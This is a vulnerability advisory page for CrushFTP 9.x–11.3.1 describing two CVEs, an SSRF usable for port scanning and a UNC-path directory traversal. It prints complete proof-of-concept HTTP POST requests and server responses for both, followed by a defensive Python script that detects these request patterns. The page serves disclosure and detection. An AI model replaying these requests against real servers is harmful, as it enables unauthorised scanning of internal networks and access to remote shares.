
📄 CrushFTP 9.x / 10.8.4 / 11.3.1 Server-Side Request Forgery / Directory Traversal

🗓️ 14 Apr 2025 00:00:00 | Reported by Rafael Pedrero | Type: packetstorm | 🔗 packetstorm.news | 👁 384 Views

Server-Side Request Forgery and Directory Traversal in CrushFTP versions 9.x to 11.3.1 detected.

<!--
    # Exploit Title: Server-Side Request Forgery (SSRF) in CrushFTP 10.7.1 and 11.1.0 (as well as legacy 9.x)
    # Date: 2024-10-20
    # Exploit Author: Rafael Pedrero
    # Vendor Homepage: https://www.crushftp.com/
    # Software Link: https://www.crushftp.com/download/
    # Version: CrushFTP 9.x and 10.x through 10.8.4 and 11.x through 11.3.1
    # Tested on: all
    # CVE : CVE-2025-32102
    # Vulnerability: CWE-918
    # Category: webapps
    
    1. Description
    
    CrushFTP 9.x and 10.x through 10.8.4 and 11.x through 11.3.1 allows SSRF
    via the host and port parameters in a command=telnetSocket request to the
    /WebInterface/function/ URI.
    
    2. Proof of Concept
    
    The application has a form to establish telnet connections. The target is
    entered in the host and port parameters, for example,
    "host=127.0.0.1&port=8080". It can be used to scan remote ports, because
    the response contains the string "Connected" when the connection succeeds
    and "Connection%20refused" when it does not.
    
    POST http://127.0.0.1:9090/WebInterface/function/ HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
    Accept: */*
    Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 101
    Origin: http://127.0.0.1:9090
    Connection: keep-alive
    Referer: http://127.0.0.1:9090/WebInterface/admin/telnet.html
    Cookie: CrushAuth=1729605510796_1Zx7MxaDU90dcHQHzIRihmd4peCaVq; currentAuth=CaVq
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    Host: 127.0.0.1:9090
    
    command=telnetSocket&sub_command=connect&host=127.0.0.1&port=8080&random=0.17159638175272862&c2f=CaVq
    
    Open port: 8080
    <commandResult><response><id>PeT</id><data>Connected (/127.0.0.1)
    </data></response></commandResult>
    
    Closed port: 8888
    <commandResult><response><error>ERROR:java.net.ConnectException%3A%20Connection%20refused%3A%20getsockopt:
    (/127.0.0.1)</error>Error:java.lang.NullPointerException
    </response></commandResult>
    
    
    3. Solution:
    
    Update to the latest version of this product.
    
    -->
    <!--
    # Exploit Title: Directory Traversal in CrushFTP 10.7.1 and 11.1.0 (as well as legacy 9.x)
    # Date: 2024-10-20
    # Exploit Author: Rafael Pedrero
    # Vendor Homepage: https://www.crushftp.com/
    # Software Link: https://www.crushftp.com/download/
    # Version: CrushFTP 9.x and 10.x through 10.8.4 and 11.x through 11.3.1
    # Tested on: all
    # CVE : CVE-2025-32103
    # Vulnerability: CWE-40
    # Category: webapps
    
    1. Description
    
    CrushFTP 9.x and 10.x through 10.8.4 and 11.x through 11.3.1 allows
    directory traversal via the /WebInterface/function/ URI to read files
    accessible by SMB at UNC share pathnames, bypassing SecurityManager
    restrictions.
    
    2. Proof of Concept
    
    The application's logic does not account for the fact that, when listing
    directories or files, the path can be modified to allow UNC paths from
    another machine on the network or on the internet instead of local files.
    An attacker injects a UNC path (\\server\resource) instead of a local path
    (such as C:/PATH) and gains access to remote directories or files. This is
    more specific than typical Path Traversal and occurs when network paths are
    not properly filtered or restricted.
    
    POST http://127.0.0.1:9090/WebInterface/function/ HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
    Accept: */*
    Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 113
    Origin: http://127.0.0.1:9090
    Connection: keep-alive
    Referer: http://127.0.0.1:9090/WebInterface/Preferences/index.html
    Cookie: CrushAuth=1729605510796_1Zx7MxaDU90dcHQHzIRihmd4peCaVq; currentAuth=CaVq
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    Host: 127.0.0.1:9090
    
    command=getAdminXMLListing&file_mode=server&format=JSON&path=\\\\vboxsrv\\demo&random=0.7936410212028374&c2f=CaVq
    
    <?xml version="1.0" encoding="UTF-8"?>
    <listingInfo type="properties">
    <path>////vboxsrv/demo/</path>
    <privs>(read)(view)</privs>
    <listing>l = new Array();
    lp = {};
    lp.name="directorio1";
    lp.type="DIR";
    lp.root_dir="//vboxsrv/demo/";
    lp.href_path="////vboxsrv/demo/directorio1";
    lp.privs="(read)(view)";
    lp.size="0";
    lp.modified="0";
    lp.created="null";
    l[l.length] = lp;
    lp = {};
    lp.name="directorio2";
    lp.type="DIR";
    lp.root_dir="//vboxsrv/demo/";
    lp.href_path="////vboxsrv/demo/directorio2";
    ...
    
    
    The vulnerable parameter is path, where the local path can be changed to a
    remote path, thereby displaying remote directories. This could later be
    used for potential file downloads within those directories, just as it
    would if they were local.
    
    
    3. Solution:
    
    Update to the latest version of this product.
    
    -->
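
A defender-side check for the two request patterns described in the advisories above, as an added example that is not part of the original advisories or of CrushFTP: it parses POST bodies sent to /WebInterface/function/ and flags getAdminXMLListing requests whose path is a UNC share, plus sessions that use telnetSocket against several host:port targets. The session labels, the fs01 host, the body-log source and the threshold of 3 are constructed assumptions.

```python
from collections import defaultdict
from urllib.parse import parse_qs

# Constructed sample: (session label, POST body) pairs for /WebInterface/function/,
# as they might be recovered from a reverse-proxy or WAF body log (assumed source).
SAMPLE = [
    ("s1", "command=telnetSocket&sub_command=connect&host=127.0.0.1&port=8080&c2f=CaVq"),
    ("s1", "command=telnetSocket&sub_command=connect&host=127.0.0.1&port=8888&c2f=CaVq"),
    ("s1", "command=telnetSocket&sub_command=connect&host=127.0.0.1&port=3306&c2f=CaVq"),
    ("s2", r"command=getAdminXMLListing&file_mode=server&format=JSON&path=\\\\vboxsrv\\demo&c2f=CaVq"),
    ("s2", "command=getAdminXMLListing&file_mode=server&format=JSON&path=%5C%5Cfs01%5Cshare"),
    ("s3", "command=getAdminXMLListing&file_mode=server&format=JSON&path=/var/ftp/&c2f=Ab12"),
    ("s3", "command=telnetSocket&sub_command=connect&host=10.0.0.5&port=22&c2f=Ab12"),
]


def first(form, key):
    """Return the first value of a form field, or an empty string."""
    return form.get(key, [""])[0]


def is_unc_path(path):
    """True when the path starts with two slashes or backslashes and names a host."""
    unified = path.replace("\\", "/")
    return unified.startswith("//") and unified.strip("/") != ""


def analyze(events, scan_threshold=3):
    """Flag UNC listing paths and sessions probing many host:port targets."""
    findings = []
    probed = defaultdict(set)  # session -> {(host, port)} requested via telnetSocket
    for session, body in events:
        form = parse_qs(body, keep_blank_values=True)  # also decodes %5C to a backslash
        command = first(form, "command")
        if command == "telnetSocket" and first(form, "sub_command") == "connect":
            before = len(probed[session])
            probed[session].add((first(form, "host"), first(form, "port")))
            # Report once, at the moment the session crosses the threshold.
            if before < scan_threshold <= len(probed[session]):
                findings.append((session, "telnetSocket-scan", scan_threshold))
        elif command == "getAdminXMLListing" and is_unc_path(first(form, "path")):
            findings.append((session, "unc-listing", first(form, "path")))
    return findings


if __name__ == "__main__":
    for finding in analyze(SAMPLE):
        print(finding)
```

Because telnetSocket is a legitimate admin function, a single connect request is not flagged; only the multi-target pattern is.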


14 Apr 2025 00:00 (current) | Vulners AI Score: 7 (High risk) | CVSS 3.1: 5 | EPSS: 0.01409